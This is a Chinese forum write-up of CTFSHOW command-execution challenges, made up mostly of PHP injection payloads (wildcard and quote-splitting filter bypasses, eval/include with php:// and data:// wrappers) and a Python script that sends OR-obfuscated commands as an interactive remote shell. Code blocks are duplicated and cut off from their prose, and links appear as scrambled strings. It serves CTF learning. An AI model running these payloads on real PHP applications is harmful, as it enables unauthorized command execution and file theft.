首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. CTF对抗
    3. 发新帖
[原创]CTFSHOW命令执行WP
发表于: 2021-9-22 17:26 27505

[原创]CTFSHOW命令执行WP

H3h3QAQ 活跃值
1
2021-9-22 17:26
27505

过滤了flag

payload:

随便写几个姿势

过滤了flag|system|php

用echo 反引号来执行命令

payload:

过滤了flag|system|php|cat|sort|shell|\.| |

没关系,我们有都是姿势

payload:

include不用括号,分号可以用?>代替。

payload:

payload:

payload:

过滤了flag

payload:

payload:

理论上是异或

然后我懒

贴exp:

exp取自4bdK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4M7q4)9J5k6h3y4@1k6W2)9J5k6i4y4Z5L8%4N6Q4x3V1k6V1i4K6u0r3x3e0x3%4i4K6u0V1j5%4c8X3M7$3S2G2N6#2)9J5k6s2N6W2j5W2)9J5k6s2N6W2j5U0b7I4i4K6u0r3y4l9`.`.

/dev/null 2>&1,让所有的输出流(包括错误的和正确的)都定向到空设备丢弃

%0a%26||截断

payload:

过滤了;|cat

payload:

多过滤了个flag

通配符搞定

payload:

空格被过滤了

payload:

过滤了\;|cat|flag| |[0-9]|\\$|\*/

payload:

payload:

payload:

payload:

payload:

= = 只能是数字

对不起骚套路开始

payload:

2abK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4q4I4i4K6g2X3y4o6j5H3z5e0p5@1y4U0c8Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0p5H3z5o6f1I4x3K6p5@1y4b7`.`.

数据包:

凑36

-37取反=36

payload:

绕过disable_functions

我只想到一种

file可以把文件读取到一个数组,再打印出来

payload:

payload:

payload:

= = 好家伙

ban的真多

payload:

ob_get_contents — 返回输出缓冲区的内容 ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲

此函数丢弃最顶层输出缓冲区的内容并关闭这个缓冲区。如果想要进一步处理缓冲区的内容,必须在ob_end_clean()之前调用ob_get_contents(),因为当调用ob_end_clean()时缓冲区内容将被丢弃。

889K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4y4G2L8r3W2@1N6h3c8A6i4K6u0r3j5i4u0@1K9h3y4D9k6g2)9J5c8X3c8W2N6r3q4A6L8s2y4Q4x3V1j5I4x3o6V1^5x3K6M7$3y4o6m8Q4x3@1k6G2M7s2y4Q4y4h3k6J5k6i4q4#2k6i4y4@1i4K6g2X3L8h3W2K6j5#2)9K6c8q4)9J5y4e0t1#2y4@1u0Q4x3U0f1J5y4e0t1J5M7X3g2I4N6h3g2K6N6q4)9J5y4e0t1#2y4f1k6A6k6q4)9J5y4e0t1#2x3U0u0Q4x3U0f1J5y4e0y4m8i4K6t1#2x3U0f1J5x3U0p5$3x3K6l9$3x3U0R3^5x3e0M7I4y4U0M7^5x3o6t1$3z5e0R3&6y4K6V1J5z5q4)9J5y4e0t1#2x3U0u0Q4x3U0f1J5y4e0u0o6i4K6t1#2x3U0f1J5x3Y4y4U0L8g2)9J5y4e0t1#2x3U0u0Q4x3U0f1J5y4e0y4m8i4K6t1#2x3U0f1J5x3U0t1H3x3e0b7H3y4K6p5K6i4K6u0W2x3e0x3H3x3e0l9J5x3K6x3@1i4K6u0W2i4K6u0W2i4K6t1#2x3U0f1J5x3W2)9J5y4e0t1#2y4@1c8Q4x3U0k6S2L8i4m8Q4x3@1u0J5k6i4q4#2k6i4y4@1i4K6g2X3K9h3c8Q4x3@1b7I4y4U0x3H3y4U0t1^5z5o6p5%4x3e0j5%4z5o6l9J5y4U0V1^5z5e0M7&6x3U0S2Q4x3U0k6S2L8i4m8Q4x3@1u0T1K9i4A6Q4y4h3k6A6k6q4)9K6c8o6m8Q4x3U0k6S2L8i4m8Q4x3@1u0#2N6r3#2Q4y4h3k6E0k6h3c8A6N6h3#2Q4x3@1c8V1K9i4y4@1M7X3W2T1N6i4c8W2i4K6u0W2M7r3y4Q4y4h3k6K6k6h3q4J5j5$3S2Q4y4h3k6J5k6i4y4#2L8s2c8Q4x3X3g2F1L8$3&6W2i4K6u0V1N6r3q4K6K9#2)9J5k6r3u0D9L8$3N6Q4x3X3b7J5i4K6N6q4j5h3I4D9i4K6N6q4M7$3!0T1j5h3W2V1N6h3g2F1k6q4)9%4c8h3c8W2k6X3q4#2L8s2c8Q4x3X3b7I4i4K6u0V1x3e0l9&6z5o6x3%4y4U0b7H3i4K6u0W2k6X3W2J5M7%4c8Q4y4h3k6J5j5h3&6C8i4K6g2X3N6U0u0Q4y4h3k6H3j5#2)9#2k6Y4u0S2L8X3E0Q4y4h3k6$3x3U0W2Q4x3U0k6S2L8i4m8Q4x3@1u0#2N6r3#2Q4y4h3k6@1k6i4u0E0i4K6y4p5P5e0c8@1j5h3y4C8k6i4u0Q4x3V1u0Q4x3U0g2q4y4g2)9J5y4e0V1I4i4K6t1#2b7V1c8Q4x3U0g2q4y4q4)9J5y4f1u0n7i4K6t1#2b7e0c8Q4x3U0g2q4y4W2)9J5y4e0R3&6i4K6t1#2b7e0N6Q4x3U0g2q4z5q4)9J5y4f1p5I4i4K6t1#2z5p5y4Q4x3U0k6S2L8i4m8Q4x3@1u0K6M7r3#2Q4x3@1b7I4x3o6p5^5i4K6u0W2x3U0t1J5y4W2)9J5k6e0x3H3x3o6q4Q4x3X3f1@1x3e0R3%4 y4的blog说的很清楚

payload:

看一下y4的blog就可以了= = payload不贴了 太长了。

##web73

看一下目录

然后

payload:

同73题

扫目录

mysql load_file读文件

不是很清楚这个题怎么做

但是我复现了一下

50aK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2D9j5i4u0#2k6h3&6U0k6g2)9J5k6h3y4G2L8g2)9J5c8U0t1H3x3U0m8Q4x3V1j5H3x3#2)9J5c8U0p5I4i4K6u0r3y4e0b7%4y4g2)9J5k6h3S2@1L8h3H3`.

b0fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8X3#2A6N6i4A6*7P5q4)9J5c8X3q4J5N6r3W2U0L8r3g2Q4x3V1k6V1k6i4c8S2K9h3I4K6i4K6u0r3x3e0l9^5y4U0p5&6z5e0x3H3

 
 
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
剩下的我不会了
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
剩下的我不会了
 
 
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
 
 
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
 
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;   
    }
}else{
    highlight_file(__FILE__);
}
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;   
    }
}else{
    highlight_file(__FILE__);
}
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php system("nl fla*");?>
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php system("nl fla*");?>
 
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php%20system("nl%20f*");?>
/?c=data://text/palin,<?php%20system("nl%20f*");?>
 
 
import re
content = ''
preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/'
for i in range(256):
    for j in range(256):
        if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)):
            k = i | j
            if k>=32 and k<=126:
                a = '%' + hex(i)[2:].zfill(2)
                b = '%' + hex(j)[2:].zfill(2)
                content += (chr(k) + ' '+ a + ' ' + b + '\n')
f = open('rce_or.txt', 'w')
f.write(content)
import re
content = ''
preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/'
for i in range(256):
    for j in range(256):
        if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)):
            k = i | j
            if k>=32 and k<=126:
                a = '%' + hex(i)[2:].zfill(2)
                b = '%' + hex(j)[2:].zfill(2)
                content += (chr(k) + ' '+ a + ' ' + b + '\n')
f = open('rce_or.txt', 'w')
f.write(content)
# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os
os.system("php rce_or.php"#没有将php写入环境变量需手动运行
if(len(argv)!=2):
    print("="*50)
    print('USER:python exp.py <url>')
    print("eg:  python exp.py 295K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4@1k6W2)9J5k6i4y4Z5L8%4N6Q4x3V1j5`.")
    print("="*50)
    exit(0)
url=argv[1]
def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("rce_or.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                #print(i)
                s1+=t[2:5]
                s2+=t[6:9]
                break
        f.close()
    output="(\""+s1+"\"|\""+s2+"\")"
    return(output)
 
while True:
    param=action(input("\n[+] your function:") )+action(input("[+] your command:"))
    data={
        'c':urllib.parse.unquote(param)
        }
    r=requests.post(url,data=data)
    print("\n[*] result:\n"+r.text)
# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os
os.system("php rce_or.php"#没有将php写入环境变量需手动运行
if(len(argv)!=2):
    print("="*50)
    print('USER:python exp.py <url>')
    print("eg:  python exp.py 295K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4@1k6W2)9J5k6i4y4Z5L8%4N6Q4x3V1j5`.")
    print("="*50)
    exit(0)
url=argv[1]
def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("rce_or.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                #print(i)
                s1+=t[2:5]
                s2+=t[6:9]
                break

[培训]科锐逆向工程师培训第53期2025年7月8日开班!

收藏
免费 3
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回